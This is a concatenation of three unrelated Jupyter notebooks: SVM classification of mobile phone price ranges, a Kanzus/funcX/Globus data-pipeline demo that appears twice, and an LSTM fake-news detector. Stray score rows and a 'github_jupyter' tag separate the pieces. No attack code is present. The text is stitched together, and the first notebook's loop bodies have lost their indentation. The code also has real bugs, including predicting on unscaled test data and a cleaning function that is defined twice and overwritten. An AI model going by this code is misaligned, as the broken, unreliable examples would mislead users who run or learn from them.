#5. SV Regressor
#6. Non Linear SVM with kernal - RBF ( note: you can also try poly )
#7. Non Linear SVR
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
import seaborn as sns
import matplotlib.pyplot as plt
from matplotlib.colors import ListedColormap
#connect to google drive
from google.colab import drive
drive.mount('/content/drive')
# A.DATA PREPROCESSING
# save filepath to variable for easier access
train_file_path = '../content/drive/MyDrive/pemb mesin/mgg 8/train1.csv'
test_file_path = '../content/drive/MyDrive/pemb mesin/mgg 8/test1.csv'
df = pd.read_csv(train_file_path)
test = pd.read_csv(test_file_path)
df.head()
df.info()
#battery_power: Total energy a battery can store in one time measured in mAh
#blue: Has bluetooth or not
#clock_speed: speed at which microprocessor executes instructions
#dual_sim: Has dual sim support or not
#fc: Front Camera mega pixels
#four_g: Has 4G or not
#int_memory: Internal Memory in Gigabytes
#m_dep: Mobile Depth in cm
#mobile_wt: Weight of mobile phone
#n_cores: Number of cores of processor
#pc: Primary Camera mega pixels
#px_height: Pixel Resolution Height
#px_width: Pixel Resolution Width
#ram: Random Access Memory in Mega Bytes
#sc_h: Screen Height of mobile in cm
#sc_w: Screen Width of mobile in cm
#talk_time: longest time that a single battery charge will last when you are
#three_g: Has 3G or not
#touch_screen: Has touch screen or not
#wifi: Has wifi or not
#price_range: This is the target variable with value of 0(low cost), 1(medium cost), 2(high cost) and 3(very high cost).
#cek missing values
import missingno as msno
import matplotlib.pyplot as plt
msno.bar(df)
plt.show()
#B. TARGET VALUE ANALYSIS
#understanding the predicted value - which is hot encoded, in real life price won't be hot encoded.
df['price_range'].describe(), df['price_range'].unique()
# there are 4 classes in the predicted value
#correlation matrix with heatmap (mencari korelasi antar features, salah satu teknik features selection)
corrmat = df.corr()
f,ax = plt.subplots(figsize=(12,10))
sns.heatmap(corrmat,vmax=0.8,square=True,annot=True,annot_kws={'size':8})
#price range correlation
corrmat.sort_values(by=["price_range"],ascending=False).iloc[0].sort_values(ascending=False)
f, ax = plt.subplots(figsize=(10,4))
plt.scatter(y=df['price_range'],x=df['battery_power'],color='red')
plt.scatter(y=df['price_range'],x=df['ram'],color='Green')
plt.scatter(y=df['price_range'],x=df['n_cores'],color='blue')
plt.scatter(y=df['price_range'],x=df['mobile_wt'],color='orange')
# clearly we can see that each of the category has different set of value ranges
# SUPPORT VECTOR MACHINES AND METHODS :
from sklearn.svm import SVC
from sklearn.model_selection import train_test_split
y_t = np.array(df['price_range'])
X_t = df
X_t = df.drop(['price_range'],axis=1)
X_t = np.array(X_t)
print("shape of Y :"+str(y_t.shape))
print("shape of X :"+str(X_t.shape))
from sklearn.preprocessing import MinMaxScaler #(scaling rentang 0-1)
scaler = MinMaxScaler()
X_t = scaler.fit_transform(X_t)
X_train,X_test,Y_train,Y_test = train_test_split(X_t,y_t,test_size=.20,random_state=42)
print("shape of X Train :"+str(X_train.shape))
print("shape of X Test :"+str(X_test.shape))
print("shape of Y Train :"+str(Y_train.shape))
print("shape of Y Test :"+str(Y_test.shape))
for this_C in [1,3,5,10,40,60,80,100]: #parameter C di SVM Linier
clf = SVC(kernel='linear',C=this_C).fit(X_train,Y_train) #clf = cross validate metrics for evaluating classification
scoretrain = clf.score(X_train,Y_train)
scoretest = clf.score(X_test,Y_test)
print("Linear SVM value of C:{}, training score :{:2f} , Test Score: {:2f} \n".format(this_C,scoretrain,scoretest))
from sklearn.model_selection import cross_val_score,StratifiedKFold,LeaveOneOut
clf1 = SVC(kernel='linear',C=20).fit(X_train,Y_train)
scores = cross_val_score(clf1,X_train,Y_train,cv=5)
strat_scores = cross_val_score(clf1,X_train,Y_train,cv=StratifiedKFold(5,random_state=10,shuffle=True))
#Loo = LeaveOneOut()
#Loo_scores = cross_val_score(clf1,X_train,Y_train,cv=Loo)
print("The Cross Validation Score :"+str(scores))
print("The Average Cross Validation Score :"+str(scores.mean()))
print("The Stratified Cross Validation Score :"+str(strat_scores))
print("The Average Stratified Cross Validation Score :"+str(strat_scores.mean()))
#print("The LeaveOneOut Cross Validation Score :"+str(Loo_scores))
#print("The Average LeaveOneOut Cross Validation Score :"+str(Loo_scores.mean()))
from sklearn.dummy import DummyClassifier
for strat in ['stratified', 'most_frequent', 'prior', 'uniform']:
dummy_maj = DummyClassifier(strategy=strat).fit(X_train,Y_train)
print("Train Stratergy :{} \n Score :{:.2f}".format(strat,dummy_maj.score(X_train,Y_train)))
print("Test Stratergy :{} \n Score :{:.2f}".format(strat,dummy_maj.score(X_test,Y_test)))
# plotting the decision boundries for the data
#converting the data to array for plotting.
X = np.array(df.iloc[:,[0,13]])
y = np.array(df['price_range'])
print("Shape of X:"+str(X.shape))
print("Shape of y:"+str(y.shape))
X = scaler.fit_transform(X)
# custome color maps
cm_dark = ListedColormap(['#ff6060', '#8282ff','#ffaa00','#fff244','#4df9b9','#76e8fc','#3ad628'])
cm_bright = ListedColormap(['#ffafaf', '#c6c6ff','#ffaa00','#ffe2a8','#bfffe7','#c9f7ff','#9eff93'])
plt.scatter(X[:,0],X[:,1],c=y,cmap=cm_dark,s=10,label=y)
plt.show()
h = .02 # step size in the mesh
C_param = 1 # No of neighbours
for weights in ['uniform', 'distance']:
# we create an instance of Neighbours Classifier and fit the data.
clf1 = SVC(kernel='linear',C=C_param)
clf1.fit(X, y)
# Plot the decision boundary. For that, we will assign a color to each
# point in the mesh [x_min, x_max]x[y_min, y_max].
x_min, x_max = X[:, 0].min()-.20, X[:, 0].max()+.20
y_min, y_max = X[:, 1].min()-.20, X[:, 1].max()+.20
xx, yy = np.meshgrid(np.arange(x_min, x_max, h),
np.arange(y_min, y_max, h))
Z = clf1.predict(np.c_[xx.ravel(), yy.ravel()]) # ravel to flatten the into 1D and c_ to concatenate
# Put the result into a color plot
Z = Z.reshape(xx.shape)
plt.figure()
plt.pcolormesh(xx, yy, Z, cmap=cm_bright)
# Plot also the training points
plt.scatter(X[:, 0], X[:, 1], c=y, cmap=cm_dark,
edgecolor='k', s=20)
plt.xlim(xx.min(), xx.max())
plt.ylim(yy.min(), yy.max())
plt.title("SVM Linear Classification (kernal = linear, Gamma = '%s')"% (C_param))
plt.show()
print("The score of the above :"+str(clf1.score(X,y)))
# Linear Support vector machine with only C Parameter
from sklearn.svm import LinearSVC
for this_C in [1,3,5,10,40,60,80,100]:
clf2 = LinearSVC(C=this_C).fit(X_train,Y_train)
scoretrain = clf2.score(X_train,Y_train)
scoretest = clf2.score(X_test,Y_test)
print("Linear SVM value of C:{}, training score :{:2f} , Test Score: {:2f} \n".format(this_C,scoretrain,scoretest))
from sklearn.svm import SVR
svr = SVR(kernel='linear',C=1,epsilon=.01).fit(X_train,Y_train)
print("{:.2f} is the accuracy of the SV Regressor".format(svr.score(X_train,Y_train)))
#NON LINIER SVM
# SMV with RBF KERNAL AND ONLY C PARAMETER
for this_C in [1,5,10,25,50,100]:
clf3 = SVC(kernel='rbf',C=this_C).fit(X_train,Y_train)
clf3train = clf3.score(X_train,Y_train)
clf3test = clf3.score(X_test,Y_test)
print("SVM for Non Linear \n C:{} Training Score : {:2f} Test Score : {:2f}\n".format(this_C,clf3train,clf3test))
# SVM WITH RBF KERNAL, C AND GAMMA HYPERPARAMTER
for this_gamma in [.1,.5,.10,.25,.50,1]:
for this_C in [1,5,7,10,15,25,50]:
clf3 = SVC(kernel='rbf',C=this_C,gamma=this_gamma).fit(X_train,Y_train)
clf3train = clf3.score(X_train,Y_train)
clf3test = clf3.score(X_test,Y_test)
print("SVM for Non Linear \n Gamma: {} C:{} Training Score : {:2f} Test Score : {:2f}\n".format(this_gamma,this_C,clf3train,clf3test))
# grid search method
from sklearn.model_selection import GridSearchCV
param_grid = {'C': [1,5,7,10,15,25,50],
'gamma': [.1,.5,.10,.25,.50,1]}
GS = GridSearchCV(SVC(kernel='rbf'),param_grid,cv=5)
GS.fit(X_train,Y_train)
print("the parameters {} are the best.".format(GS.best_params_))
print("the best score is {:.2f}.".format(GS.best_score_))
# Kernalized SVM machine
svr2 = SVR(degree=2,C=100,epsilon=.01).fit(X_train,Y_train)
print("{:.2f} is the accuracy of the SV Regressor".format(svr2.score(X_train,Y_train)))
test = test.drop(['id'],axis=1)
test.head()
test_mat = np.array(test)
test = scaler.fit_transform(test_mat)
clf4 = SVC(kernel='rbf',C=25,gamma=.1).fit(X_train,Y_train)
prediction = clf4.predict(test_mat)
pred = pd.DataFrame(prediction)
pred.head()
pred.info()
prediction = svr2.predict(test_mat)
pred = pd.DataFrame(prediction)
pred.head()
| 0.420124 | 0.569613 |
# Kanzus Pipeline Example
This notebook demonstrates how the Kanzus pipeline is used to perform on-demand distributed analysis.
```
import os
import sys
import json
import time
import numpy as np
from funcx.sdk.client import FuncXClient
from gladier.client import GladierClient as GladierBaseClient
from globus_automate_client import (create_flows_client, create_action_client, create_flows_client)
```
## Creating and using pipelines
Here we create a simple pipeline to move data and run an analysis function. The pipeline is just two steps but shows how Globus Automate and funcX can be used to create a reliable and secure distributed flow.
### Register a function to use
Start by defining a function and registering it with funcX. This function will be used within the example pipeline.
```
fxc = FuncXClient()
def file_size(data):
"""Return the size of a file"""
import os
return os.path.getsize(data['pathname'])
func_uuid = fxc.register_function(file_size)
```
Test the function works on some data
```
payload = {'pathname': '/etc/hostname'}
theta_ep = '6c4323f4-a062-4551-a883-146a352a43f5'
res = fxc.run(payload, endpoint_id=theta_ep, function_id=func_uuid)
fxc.get_result(res)
```
### Define a flow for the function
Now define a flow to perform a Globus Transfer and then run the above function.
```
flow_definition = {
"Comment": "An analysis flow",
"StartAt": "Transfer",
"States": {
"Transfer": {
"Comment": "Initial transfer",
"Type": "Action",
"ActionUrl": "https://actions.automate.globus.org/transfer/transfer",
"Parameters": {
"source_endpoint_id.$": "$.input.source_endpoint",
"destination_endpoint_id.$": "$.input.dest_endpoint",
"transfer_items": [
{
"source_path.$": "$.input.source_path",
"destination_path.$": "$.input.dest_path",
"recursive": False
}
]
},
"ResultPath": "$.Transfer1Result",
"Next": "Analyze"
},
"Analyze": {
"Comment": "Run a funcX function",
"Type": "Action",
"ActionUrl": "https://api.funcx.org/automate",
"ActionScope": "https://auth.globus.org/scopes/facd7ccc-c5f4-42aa-916b-a0e270e2c2a9/automate2",
"Parameters": {
"tasks": [{
"endpoint.$": "$.input.fx_ep",
"func.$": "$.input.fx_id",
"payload": {
"pathname.$": "$.input.pathname"
}
}]
},
"ResultPath": "$.AnalyzeResult",
"End": True
}
}
}
```
Register and run the flow
```
flows_client = create_flows_client()
flow = flows_client.deploy_flow(flow_definition, title="Stills process workflow")
flow_id = flow['id']
flow_scope = flow['globus_auth_scope']
print(f'Newly created flow with id: {flow_id}')
src_ep = 'ddb59aef-6d04-11e5-ba46-22000b92c6ec' # EP1
dest_ep = 'ddb59af0-6d04-11e5-ba46-22000b92c6ec' # EP2
filename = 'test.txt'
flow_input = {
"input": {
"source_endpoint": src_ep,
"source_path": f"/~/{filename}",
"dest_endpoint": dest_ep,
"dest_path": f"/~/{filename}",
"result_path": f"/~/out_{filename}",
"fx_id": func_uuid,
"fx_ep": theta_ep,
"pathname": '/etc/hostname'
}
}
flow_action = flows_client.run_flow(flow_id, flow_scope, flow_input)
print(flow_action)
flow_action_id = flow_action['action_id']
flow_status = flow_action['status']
print(f'Flow action started with id: {flow_action_id}')
while flow_status == 'ACTIVE':
time.sleep(10)
flow_action = flows_client.flow_action_status(flow_id, flow_scope, flow_action_id)
flow_status = flow_action['status']
print(f'Flow status: {flow_status}')
flow_action['details']['output']['AnalyzeResult']
```
## Gladier Beam XY Search
Gladier removes a lot of this complexity by managing registering functions and flows when they change. Here we create a Gladier client and specify the tools that will be used in the flow.
```
from gladier_kanzus.flows.search_flow import flow_definition
class KanzusXYSearchClient(GladierBaseClient):
client_id = 'e6c75d97-532a-4c88-b031-8584a319fa3e'
gladier_tools = [
'gladier_kanzus.tools.XYSearch',
'gladier_kanzus.tools.CreatePhil',
'gladier_kanzus.tools.DialsStills',
'gladier_kanzus.tools.XYPlot',
'gladier_kanzus.tools.SSXGatherData',
'gladier_kanzus.tools.SSXPublish',
]
flow_definition = flow_definition
search_client = KanzusXYSearchClient()
```
Register the stills function in a container
```
from gladier_kanzus.tools.dials_stills import funcx_stills_process as stills_cont
container = '/home/rvescovi/.funcx/containers/dials_v1.simg'
dials_cont_id = fxc.register_container(location=container, container_type='singularity')
stills_cont_fxid = fxc.register_function(stills_cont, container_uuid=dials_cont_id)
```
Define input to the flow. This describes the dataset that will be analyzed and the parameters for analysis.
```
conf = {'local_endpoint': '8f2f2eab-90d2-45ba-a771-b96e6d530cad',
'queue_endpoint': '23519765-ef2e-4df2-b125-e99de9154611',
}
data_dir = '/eagle/APSDataAnalysis/SSX/Demo/test'
proc_dir = f'{data_dir}/xy'
upload_dir = f'{data_dir}/test_images'
flow_input = {
"input": {
#Processing variables
"proc_dir": proc_dir,
"data_dir": data_dir,
"upload_dir": upload_dir,
#Dials specific variables.
"input_files": "Test_33_{00000..00010}.cbf",
"input_range": "00000..00010",
"nproc": 10,
"beamx": "-214.400",
"beamy": "218.200",
# xy search parameters
"step": "1",
# funcX endpoints
"funcx_local_ep": conf['local_endpoint'],
"funcx_queue_ep": conf['queue_endpoint'],
# container hack for stills
"stills_cont_fxid": stills_cont_fxid,
# publication
"trigger_name": f"{data_dir}/Test_33_00001.cbf"
}
}
flow_input['input']
phils_flow = search_client.start_flow(flow_input=flow_input)
```
Check the results:
https://petreldata.net/kanzus/projects/ssx/globus%253A%252F%252Fc7683485-3c3f-454a-94c0-74310c80b32a%252Fssx%252Ftest_images/
# Kanzus Pipeline
The full Kanzus pipeline is designed to be triggered as data are collected. It moves data to ALCF, performs analysis, analyzes the PRIME results, and publishes results to the portal.
# Virtual Beamline
|
github_jupyter
|
import os
import sys
import json
import time
import numpy as np
from funcx.sdk.client import FuncXClient
from gladier.client import GladierClient as GladierBaseClient
from globus_automate_client import (create_flows_client, create_action_client, create_flows_client)
fxc = FuncXClient()
def file_size(data):
"""Return the size of a file"""
import os
return os.path.getsize(data['pathname'])
func_uuid = fxc.register_function(file_size)
payload = {'pathname': '/etc/hostname'}
theta_ep = '6c4323f4-a062-4551-a883-146a352a43f5'
res = fxc.run(payload, endpoint_id=theta_ep, function_id=func_uuid)
fxc.get_result(res)
flow_definition = {
"Comment": "An analysis flow",
"StartAt": "Transfer",
"States": {
"Transfer": {
"Comment": "Initial transfer",
"Type": "Action",
"ActionUrl": "https://actions.automate.globus.org/transfer/transfer",
"Parameters": {
"source_endpoint_id.$": "$.input.source_endpoint",
"destination_endpoint_id.$": "$.input.dest_endpoint",
"transfer_items": [
{
"source_path.$": "$.input.source_path",
"destination_path.$": "$.input.dest_path",
"recursive": False
}
]
},
"ResultPath": "$.Transfer1Result",
"Next": "Analyze"
},
"Analyze": {
"Comment": "Run a funcX function",
"Type": "Action",
"ActionUrl": "https://api.funcx.org/automate",
"ActionScope": "https://auth.globus.org/scopes/facd7ccc-c5f4-42aa-916b-a0e270e2c2a9/automate2",
"Parameters": {
"tasks": [{
"endpoint.$": "$.input.fx_ep",
"func.$": "$.input.fx_id",
"payload": {
"pathname.$": "$.input.pathname"
}
}]
},
"ResultPath": "$.AnalyzeResult",
"End": True
}
}
}
flows_client = create_flows_client()
flow = flows_client.deploy_flow(flow_definition, title="Stills process workflow")
flow_id = flow['id']
flow_scope = flow['globus_auth_scope']
print(f'Newly created flow with id: {flow_id}')
src_ep = 'ddb59aef-6d04-11e5-ba46-22000b92c6ec' # EP1
dest_ep = 'ddb59af0-6d04-11e5-ba46-22000b92c6ec' # EP2
filename = 'test.txt'
flow_input = {
"input": {
"source_endpoint": src_ep,
"source_path": f"/~/{filename}",
"dest_endpoint": dest_ep,
"dest_path": f"/~/{filename}",
"result_path": f"/~/out_{filename}",
"fx_id": func_uuid,
"fx_ep": theta_ep,
"pathname": '/etc/hostname'
}
}
flow_action = flows_client.run_flow(flow_id, flow_scope, flow_input)
print(flow_action)
flow_action_id = flow_action['action_id']
flow_status = flow_action['status']
print(f'Flow action started with id: {flow_action_id}')
while flow_status == 'ACTIVE':
time.sleep(10)
flow_action = flows_client.flow_action_status(flow_id, flow_scope, flow_action_id)
flow_status = flow_action['status']
print(f'Flow status: {flow_status}')
flow_action['details']['output']['AnalyzeResult']
from gladier_kanzus.flows.search_flow import flow_definition
class KanzusXYSearchClient(GladierBaseClient):
client_id = 'e6c75d97-532a-4c88-b031-8584a319fa3e'
gladier_tools = [
'gladier_kanzus.tools.XYSearch',
'gladier_kanzus.tools.CreatePhil',
'gladier_kanzus.tools.DialsStills',
'gladier_kanzus.tools.XYPlot',
'gladier_kanzus.tools.SSXGatherData',
'gladier_kanzus.tools.SSXPublish',
]
flow_definition = flow_definition
search_client = KanzusXYSearchClient()
from gladier_kanzus.tools.dials_stills import funcx_stills_process as stills_cont
container = '/home/rvescovi/.funcx/containers/dials_v1.simg'
dials_cont_id = fxc.register_container(location=container, container_type='singularity')
stills_cont_fxid = fxc.register_function(stills_cont, container_uuid=dials_cont_id)
conf = {'local_endpoint': '8f2f2eab-90d2-45ba-a771-b96e6d530cad',
'queue_endpoint': '23519765-ef2e-4df2-b125-e99de9154611',
}
data_dir = '/eagle/APSDataAnalysis/SSX/Demo/test'
proc_dir = f'{data_dir}/xy'
upload_dir = f'{data_dir}/test_images'
flow_input = {
"input": {
#Processing variables
"proc_dir": proc_dir,
"data_dir": data_dir,
"upload_dir": upload_dir,
#Dials specific variables.
"input_files": "Test_33_{00000..00010}.cbf",
"input_range": "00000..00010",
"nproc": 10,
"beamx": "-214.400",
"beamy": "218.200",
# xy search parameters
"step": "1",
# funcX endpoints
"funcx_local_ep": conf['local_endpoint'],
"funcx_queue_ep": conf['queue_endpoint'],
# container hack for stills
"stills_cont_fxid": stills_cont_fxid,
# publication
"trigger_name": f"{data_dir}/Test_33_00001.cbf"
}
}
flow_input['input']
phils_flow = search_client.start_flow(flow_input=flow_input)
| 0.279533 | 0.797833 |
# WHY FAKE NEWS IS A PROBLEM?
**Fake news refers to misinformation, disinformation or mal-information which is spread through word of mouth and traditional media and more recently through digital forms of communication such as edited videos, memes, unverified advertisements and social media propagated rumours.Fake news spread through social media has become a serious problem, with the potential of it resulting in mob violence, suicides etc as a result of misinformation circulated on social media.**

# BRIEF DESCRIPTION OF DATASET
**This dataset consists of about 40000 articles consisting of fake as well as real news. Our aim is train our model so that it can correctly predict whether a given piece of news is real or fake.The fake and real news data is given in two separate datasets with each dataset consisting around 20000 articles each.**
```
# This Python 3 environment comes with many helpful analytics libraries installed
# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python
# For example, here's several helpful packages to load in
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
# Input data files are available in the "../input/" directory.
# For example, running this (by clicking run or pressing Shift+Enter) will list all files under the input directory
import os
for dirname, _, filenames in os.walk('/kaggle/input'):
for filename in filenames:
print(os.path.join(dirname, filename))
# Any results you write to the current directory are saved as output.
```
# LOADING THE NECESSARY LIBRARIES
```
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import nltk
from sklearn.preprocessing import LabelBinarizer
from nltk.corpus import stopwords
from nltk.stem.porter import PorterStemmer
from wordcloud import WordCloud,STOPWORDS
from nltk.stem import WordNetLemmatizer
from nltk.tokenize import word_tokenize,sent_tokenize
from bs4 import BeautifulSoup
import re,string,unicodedata
from keras.preprocessing import text, sequence
from sklearn.metrics import classification_report,confusion_matrix,accuracy_score
from sklearn.model_selection import train_test_split
from string import punctuation
from nltk import pos_tag
from nltk.corpus import wordnet
import keras
from keras.models import Sequential
from keras.layers import Dense,Embedding,LSTM,Dropout
from keras.callbacks import ReduceLROnPlateau
import tensorflow as tf
```
# IMPORTING THE DATASET
```
true = pd.read_csv("../input/fake-and-real-news-dataset/True.csv")
false = pd.read_csv("../input/fake-and-real-news-dataset/Fake.csv")
```
# DATA VISUALIZATION AND PREPROCESSING
```
true.head()
false.head()
true['category'] = 1
false['category'] = 0
df = pd.concat([true,false]) #Merging the 2 datasets
sns.set_style("darkgrid")
sns.countplot(df.category)
```
**SO, WE CAN SEE THAT THE DATASET IS BALANCED**
```
df.head()
df.isna().sum() # Checking for nan Values
df.title.count()
df.subject.value_counts()
```
**MERGING ALL THE TEXT DATA INTO 1 COLUMN i.e. 'text'**
```
plt.figure(figsize = (12,8))
sns.set(style = "whitegrid",font_scale = 1.2)
chart = sns.countplot(x = "subject", hue = "category" , data = df)
chart.set_xticklabels(chart.get_xticklabels(),rotation=90)
```
**SINCE THE TOPICS IN SUBJECT COLUMN ARE DIFFERENT FOR BOTH CATEGORIES, HENCE WE HAVE TO EXCLUDE IT FROM FINAL TEXT COLUMN**
```
df['text'] = df['text'] + " " + df['title']
del df['title']
del df['subject']
del df['date']
```
**WHAT ARE STOPWORDS?**
**Stopwords are the English words which does not add much meaning to a sentence. They can safely be ignored without sacrificing the meaning of the sentence. For example, the words like the, he, have etc. Such words are already captured this in corpus named corpus. We first download it to our python environment.**
```
stop = set(stopwords.words('english'))
punctuation = list(string.punctuation)
stop.update(punctuation)
```
**DATA CLEANING**
```
def strip_html(text):
soup = BeautifulSoup(text, "html.parser")
return soup.get_text()
#Removing the square brackets
def remove_between_square_brackets(text):
return re.sub('\[[^]]*\]', '', text)
# Removing URL's
def remove_between_square_brackets(text):
return re.sub(r'http\S+', '', text)
#Removing the stopwords from text
def remove_stopwords(text):
final_text = []
for i in text.split():
if i.strip().lower() not in stop:
final_text.append(i.strip())
return " ".join(final_text)
#Removing the noisy text
def denoise_text(text):
text = strip_html(text)
text = remove_between_square_brackets(text)
text = remove_stopwords(text)
return text
#Apply function on review column
df['text']=df['text'].apply(denoise_text)
```
**WORDCLOUD FOR REAL TEXT (LABEL - 1)**
```
plt.figure(figsize = (20,20)) # Text that is not Fake
wc = WordCloud(max_words = 2000 , width = 1600 , height = 800 , stopwords = STOPWORDS).generate(" ".join(df[df.category == 1].text))
plt.imshow(wc , interpolation = 'bilinear')
```
**WORDCLOUD FOR FAKE TEXT (LABEL - 0)**
```
plt.figure(figsize = (20,20)) # Text that is Fake
wc = WordCloud(max_words = 2000 , width = 1600 , height = 800 , stopwords = STOPWORDS).generate(" ".join(df[df.category == 0].text))
plt.imshow(wc , interpolation = 'bilinear')
```
**Number of characters in texts**
```
fig,(ax1,ax2)=plt.subplots(1,2,figsize=(12,8))
text_len=df[df['category']==1]['text'].str.len()
ax1.hist(text_len,color='red')
ax1.set_title('Original text')
text_len=df[df['category']==0]['text'].str.len()
ax2.hist(text_len,color='green')
ax2.set_title('Fake text')
fig.suptitle('Characters in texts')
plt.show()
```
**The distribution of both seems to be a bit different. 2500 characters in text is the most common in original text category while around 5000 characters in text are most common in fake text category.**
**Number of words in each text**
```
fig,(ax1,ax2)=plt.subplots(1,2,figsize=(12,8))
text_len=df[df['category']==1]['text'].str.split().map(lambda x: len(x))
ax1.hist(text_len,color='red')
ax1.set_title('Original text')
text_len=df[df['category']==0]['text'].str.split().map(lambda x: len(x))
ax2.hist(text_len,color='green')
ax2.set_title('Fake text')
fig.suptitle('Words in texts')
plt.show()
```
**Average word length in a text**
```
fig,(ax1,ax2)=plt.subplots(1,2,figsize=(20,10))
word=df[df['category']==1]['text'].str.split().apply(lambda x : [len(i) for i in x])
sns.distplot(word.map(lambda x: np.mean(x)),ax=ax1,color='red')
ax1.set_title('Original text')
word=df[df['category']==0]['text'].str.split().apply(lambda x : [len(i) for i in x])
sns.distplot(word.map(lambda x: np.mean(x)),ax=ax2,color='green')
ax2.set_title('Fake text')
fig.suptitle('Average word length in each text')
def get_corpus(text):
words = []
for i in text:
for j in i.split():
words.append(j.strip())
return words
corpus = get_corpus(df.text)
corpus[:5]
from collections import Counter
counter = Counter(corpus)
most_common = counter.most_common(10)
most_common = dict(most_common)
most_common
from sklearn.feature_extraction.text import CountVectorizer
def get_top_text_ngrams(corpus, n, g):
vec = CountVectorizer(ngram_range=(g, g)).fit(corpus)
bag_of_words = vec.transform(corpus)
sum_words = bag_of_words.sum(axis=0)
words_freq = [(word, sum_words[0, idx]) for word, idx in vec.vocabulary_.items()]
words_freq =sorted(words_freq, key = lambda x: x[1], reverse=True)
return words_freq[:n]
```
**Unigram Analysis**
```
plt.figure(figsize = (16,9))
most_common_uni = get_top_text_ngrams(df.text,10,1)
most_common_uni = dict(most_common_uni)
sns.barplot(x=list(most_common_uni.values()),y=list(most_common_uni.keys()))
```
**Bigram Analysis**
```
plt.figure(figsize = (16,9))
most_common_bi = get_top_text_ngrams(df.text,10,2)
most_common_bi = dict(most_common_bi)
sns.barplot(x=list(most_common_bi.values()),y=list(most_common_bi.keys()))
```
**Trigram Analysis**
```
plt.figure(figsize = (16,9))
most_common_tri = get_top_text_ngrams(df.text,10,3)
most_common_tri = dict(most_common_tri)
sns.barplot(x=list(most_common_tri.values()),y=list(most_common_tri.keys()))
```
**Splitting the data into 2 parts - training and testing data**
```
x_train,x_test,y_train,y_test = train_test_split(df.text,df.category,random_state = 0)
max_features = 10000
maxlen = 300
```
**Tokenizing Text -> Repsesenting each word by a number**
**Mapping of orginal word to number is preserved in word_index property of tokenizer**
**Tokenized applies basic processing like changing it to lower case, explicitely setting that as False**
**Lets keep all news to 300, add padding to news with less than 300 words and truncating long ones**
```
tokenizer = text.Tokenizer(num_words=max_features)
tokenizer.fit_on_texts(x_train)
tokenized_train = tokenizer.texts_to_sequences(x_train)
x_train = sequence.pad_sequences(tokenized_train, maxlen=maxlen)
tokenized_test = tokenizer.texts_to_sequences(x_test)
X_test = sequence.pad_sequences(tokenized_test, maxlen=maxlen)
```
# Introduction to GloVe
**GloVe method is built on an important idea,
You can derive semantic relationships between words from the co-occurrence matrix.
Given a corpus having V words, the co-occurrence matrix X will be a V x V matrix, where the i th row and j th column of X, X_ij denotes how many times word i has co-occurred with word j. An example co-occurrence matrix might look as follows.**

**The co-occurrence matrix for the sentence โthe cat sat on the matโ with a window size of 1. As you probably noticed it is a symmetric matrix.
How do we get a metric that measures semantic similarity between words from this? For that, you will need three words at a time. Let me concretely lay down this statement.**
**
The behavior of P_ik/P_jk for various words
Consider the entity
P_ik/P_jk where P_ik = X_ik/X_i
Here P_ik denotes the probability of seeing word i and k together, which is computed by dividing the number of times i and k appeared together (X_ik) by the total number of times word i appeared in the corpus (X_i).
You can see that given two words, i.e. ice and steam, if the third word k (also called the โprobe wordโ),
is very similar to ice but irrelevant to steam (e.g. k=solid), P_ik/P_jk will be very high (>1),
is very similar to steam but irrelevant to ice (e.g. k=gas), P_ik/P_jk will be very small (<1),
is related or unrelated to either words, then P_ik/P_jk will be close to 1
So, if we can find a way to incorporate P_ik/P_jk to computing word vectors we will be achieving the goal of using global statistics when learning word vectors.**
**Source Credits - https://towardsdatascience.com/light-on-math-ml-intuitive-guide-to-understanding-glove-embeddings-b13b4f19c010**
```
EMBEDDING_FILE = '../input/glove-twitter/glove.twitter.27B.100d.txt'
def get_coefs(word, *arr):
return word, np.asarray(arr, dtype='float32')
embeddings_index = dict(get_coefs(*o.rstrip().rsplit(' ')) for o in open(EMBEDDING_FILE))
all_embs = np.stack(embeddings_index.values())
emb_mean,emb_std = all_embs.mean(), all_embs.std()
embed_size = all_embs.shape[1]
word_index = tokenizer.word_index
nb_words = min(max_features, len(word_index))
#change below line if computing normal stats is too slow
embedding_matrix = embedding_matrix = np.random.normal(emb_mean, emb_std, (nb_words, embed_size))
for word, i in word_index.items():
if i >= max_features: continue
embedding_vector = embeddings_index.get(word)
if embedding_vector is not None: embedding_matrix[i] = embedding_vector
```
**Some Model Parameters**
```
batch_size = 256
epochs = 10
embed_size = 100
learning_rate_reduction = ReduceLROnPlateau(monitor='val_accuracy', patience = 2, verbose=1,factor=0.5, min_lr=0.00001)
```
# TRAINING THE MODEL
```
x_train[0]
#Defining Neural Network
model = Sequential()
#Non-trainable embeddidng layer
model.add(Embedding(max_features, output_dim=embed_size, weights=[embedding_matrix], input_length=maxlen, trainable=False))
#LSTM
model.add(LSTM(units=128 , return_sequences = True , recurrent_dropout = 0.25 , dropout = 0.25))
model.add(LSTM(units=64 , recurrent_dropout = 0.1 , dropout = 0.1))
model.add(Dense(units = 32 , activation = 'relu'))
model.add(Dense(1, activation='sigmoid'))
model.compile(optimizer=keras.optimizers.Adam(lr = 0.01), loss='binary_crossentropy', metrics=['accuracy'])
model.summary()
history = model.fit(x_train, y_train, batch_size = batch_size , validation_data = (X_test,y_test) , epochs = epochs , callbacks = [learning_rate_reduction])
```
# ANALYSIS AFTER TRAINING OF MODEL
```
print("Accuracy of the model on Training Data is - " , model.evaluate(x_train,y_train)[1]*100 , "%")
print("Accuracy of the model on Testing Data is - " , model.evaluate(X_test,y_test)[1]*100 , "%")
epochs = [i for i in range(10)]
fig , ax = plt.subplots(1,2)
train_acc = history.history['accuracy']
train_loss = history.history['loss']
val_acc = history.history['val_accuracy']
val_loss = history.history['val_loss']
fig.set_size_inches(20,10)
ax[0].plot(epochs , train_acc , 'go-' , label = 'Training Accuracy')
ax[0].plot(epochs , val_acc , 'ro-' , label = 'Testing Accuracy')
ax[0].set_title('Training & Testing Accuracy')
ax[0].legend()
ax[0].set_xlabel("Epochs")
ax[0].set_ylabel("Accuracy")
ax[1].plot(epochs , train_loss , 'go-' , label = 'Training Loss')
ax[1].plot(epochs , val_loss , 'ro-' , label = 'Testing Loss')
ax[1].set_title('Training & Testing Loss')
ax[1].legend()
ax[1].set_xlabel("Epochs")
ax[1].set_ylabel("Loss")
plt.show()
pred = model.predict_classes(X_test)
pred[:5]
print(classification_report(y_test, pred, target_names = ['Fake','Not Fake']))
cm = confusion_matrix(y_test,pred)
cm
